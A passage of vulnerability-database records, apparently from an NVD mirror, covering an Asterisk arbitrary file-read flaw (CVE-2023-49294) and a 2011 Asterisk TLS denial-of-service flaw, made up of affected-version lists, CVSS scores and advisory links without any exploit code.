            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "9D3E9AC0-C0B4-4E87-8D48-2B688D28B678",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "1A8628F6-F8D1-4C0C-BD89-8E2EEF19A5F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "E27A6FD1-9321-4C9E-B32B-D6330CD3DC92",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "B6BF5EDB-9D17-453D-A22E-FDDC4DCDD85B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "4C75A21E-5D05-434B-93DE-8DAC4DD3E587",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "1D725758-C9F5-4DB2-8C45-CC052518D3FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "B5E2AECC-B681-4EA5-9DE5-2086BB37A5F4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "79EEB5E5-B79E-454B-8DCD-3272BA337A9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "892BAE5D-A64E-4FE0-9A99-8C07F342A042",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "1A716A45-7075-4CA6-9EF5-2DD088248A5C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "80EFA05B-E22D-49CE-BDD6-5C7123F1C12B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "20FD475F-2B46-47C9-B535-1561E29CB7A1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
    },
    {
      "lang": "es",
      "value": "Asterisk es un conjunto de herramientas de telefon\u00eda y centralita privada de c\u00f3digo abierto. En Asterisk anterior a las versiones 18.20.1, 20.5.1 y 21.0.1, as\u00ed como en Certified-Asterisco anterior a 18.9-cert6, es posible leer cualquier archivo arbitrario incluso cuando `live_dangerfully` no est\u00e1 habilitado. Esto permite leer archivos arbitrarios. Las versiones de Asterisk 18.20.1, 20.5.1 y 21.0.1, as\u00ed como el asterisco certificado anterior a 18.9-cert6, contienen una soluci\u00f3n para este problema."
    }
  ],
  "id": "CVE-2023-49294",
  "lastModified": "2024-11-21T08:33:12.447",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.9,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-12-14T20:15:52.730",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-03-31 22:55

Modified

2024-11-21 01:25

Severity ?

Summary

tcptls.c in the TCP/TLS server in Asterisk Open Source 1.6.1.x before 1.6.1.23, 1.6.2.x before 1.6.2.17.1, and 1.8.x before 1.8.3.1 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) by establishing many short TCP sessions to services that use a certain TLS API.

References

URL	Tags
secalert@redhat.com	http://downloads.asterisk.org/pub/security/AST-2011-004.html	Patch, Vendor Advisory
secalert@redhat.com	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html	Patch
secalert@redhat.com	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html
secalert@redhat.com	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html
secalert@redhat.com	http://openwall.com/lists/oss-security/2011/03/17/5
secalert@redhat.com	http://openwall.com/lists/oss-security/2011/03/21/12	Patch
secalert@redhat.com	http://securitytracker.com/id?1025224
secalert@redhat.com	http://www.debian.org/security/2011/dsa-2225
secalert@redhat.com	http://www.securityfocus.com/bid/46898
secalert@redhat.com	http://www.vupen.com/english/advisories/2011/0686	Vendor Advisory
secalert@redhat.com	http://www.vupen.com/english/advisories/2011/0790	Vendor Advisory
secalert@redhat.com	https://bugzilla.redhat.com/show_bug.cgi?id=688678
secalert@redhat.com	https://exchange.xforce.ibmcloud.com/vulnerabilities/66140
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-004.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html	Patch
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html
af854a3a-2127-422b-91ae-364da2661108	http://openwall.com/lists/oss-security/2011/03/17/5
af854a3a-2127-422b-91ae-364da2661108	http://openwall.com/lists/oss-security/2011/03/21/12	Patch
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1025224
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2011/dsa-2225
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/46898
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/0686	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/0790	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://bugzilla.redhat.com/show_bug.cgi?id=688678
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/66140

Impacted products

Vendor	Product	Version
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.1
digium	asterisk	1.6.1.2
digium	asterisk	1.6.1.3
digium	asterisk	1.6.1.4
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.6
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.8
digium	asterisk	1.6.1.9
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.11
digium	asterisk	1.6.1.12
digium	asterisk	1.6.1.12
digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.14
digium	asterisk	1.6.1.15
digium	asterisk	1.6.1.16
digium	asterisk	1.6.1.17
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.21
digium	asterisk	1.6.1.22
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.2
digium	asterisk	1.6.2.3
digium	asterisk	1.6.2.4
digium	asterisk	1.6.2.5
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.15
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16.1
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBFF2686-0F5C-4F20-AA93-6B63C5ADCD82",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "6D4A9B22-7978-44F3-A30C-65FE7024AB6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "06219062-9CAD-49D2-823E-E11E74B131D8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "91420C0D-C63B-4916-8335-6BE24EB738FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "FD1D7D08-AC94-49AC-9F16-A6E91F1F1EEE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "05FDA8EA-6610-4D49-9825-34EBFAAD2691",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8FE4BCF-9AE7-4F41-BA84-E9537CC1EBE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B0D15-7C09-4BBB-AC84-A1898F448DB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F259057F-3720-45D8-91B4-70A11B759794",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "A106C460-4CE2-4AC3-B2FD-310F05507511",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "3E119FF9-2AD3-450D-8BBF-C6DD063246EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "759221D5-FC37-446D-9628-233B8D0B9120",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F82D4812-0429-42D4-BD27-C76CB9E7C368",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8FE11D6-8C0A-450E-B6DA-3AFE04D82232",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FBCC8-4637-4A67-BFFD-C052C3C03C12",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "F7307E10-9FA5-4940-B837-7936384F61DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3D0DC9D6-D4D6-46CB-98DA-F4FC1835B6B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBBD0747-F3FF-46D8-A3C4-8268E37BC5AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3F759F27-008E-47FB-AC0A-EF11DA19918E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D15C82BA-BD1F-4A19-A907-E6C30042F537",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E802481-C8BD-4218-8CDC-5DB112DA946C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6FC8A53-E3C0-4660-BE75-2B5B8B4F8160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "93C020CD-D0EA-4B3E-B33C-F900B08B28FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0004AADE-1652-4242-A97D-E9818FE03CCF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "543E9C91-60FE-43AE-9B94-08DD730BA814",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "252849FA-F46E-4F5A-A488-AA53574CA884",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EB89B4F-9546-4DF0-B69F-1B9F289BB1E6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E254415-1D59-4A77-80FB-AE3EF10FBB32",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF2407D0-C324-45C4-9FBB-4294F747DBDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "F23A36CC-9AA2-4559-946D-6D0621664342",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "89C40652-E180-416A-B88A-E6313530E98A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "A28C2C5D-A573-4036-A600-BE28A3E417B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.15:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EE162390-359F-4C5D-902B-275FB1FC3EF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A0A3750-0D34-4FB5-B897-17CA0D0B7CE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "D11BE58D-5B7E-4BB5-988A-7FC2E4B92C4F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "22631AE6-5DA1-46C6-A239-C232DA0D0E7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9F5CB8CC-4CC1-4A1B-8AD1-C876D1BC80EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8591DB43-EAA0-4D58-BA23-EAD916DEA3DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "4E4747F8-1AFC-4AEF-82D8-D6604FB5222E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B82172C9-EA5B-4FC9-A445-0A297AE56FF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0C71CDAB-A299-4F1D-942D-851C899E63BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E2FA9AB9-4C83-45A3-9772-3A16030DBF1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "A88C639A-9229-4D99-9087-1B0B95539BD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0B7DE987-7351-495A-8776-37E6B7BF0C0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CB5823CC-941F-47AB-AD1F-325181D40E60",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "712AF374-846D-4F21-91C4-1BA9AB33E46D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "E431AF4E-C6A8-424F-9205-01F5FDFB3306",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F8B700A-FACB-4BC8-9DF2-972DC63D852B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FFD31B9B-2F43-4637-BE56-47A807384BF3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E6450D6B-C907-49E6-9788-E4029C09285F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "DDB0432E-024A-4C0C-87FF-448E513D2834",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "D6A6A343-FEA2-49E5-9858-455AE3B29470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D57B94E3-EA37-466C-ADC4-5180D4502FDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "64D35A89-6B21-4770-AA0F-424C5C91A254",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc8:*:*:*:*:*:*",
              "matchCriteriaId": "14817302-A34A-4980-B148-AEB4B3B49BE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FDFA96-E62A-413B-9846-F51F1F7349EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DA924386-49F6-4371-B975-B1473EEA12F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B74A1B99-8901-4690-B994-1DAD3EFA5ABB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4253C7DD-3588-4B35-B96D-C027133BE93F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "24AE11DB-16D3-42BF-BC64-E8982107D35B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "53841D77-926C-4362-BC85-BD8B6AC4391D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "F98FD6E6-EDE9-437D-B7C2-2DB65B73D230",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4BA6CA77-D358-4623-8400-78EFC47ADB7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B4E62DAB-45E0-4EAA-8E45-6D3757A679D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1355578C-B384-401A-9123-2789CBECAD0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "3491F8DB-A162-4608-B5F9-5401FE058CEB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C52730A8-D96E-46C1-8905-1D78A93E9C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6E5CD17-B14A-4BDB-BA75-261344FF6F25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEED6C07-CFB7-44DC-9A41-9B6271942123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0864DAF9-B7FA-4018-99F4-F2A7AA6FBBB0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "694B257B-E73B-4534-B316-87284FA45534",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "418FD91F-014E-4529-8D72-D3FB27788EEA",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
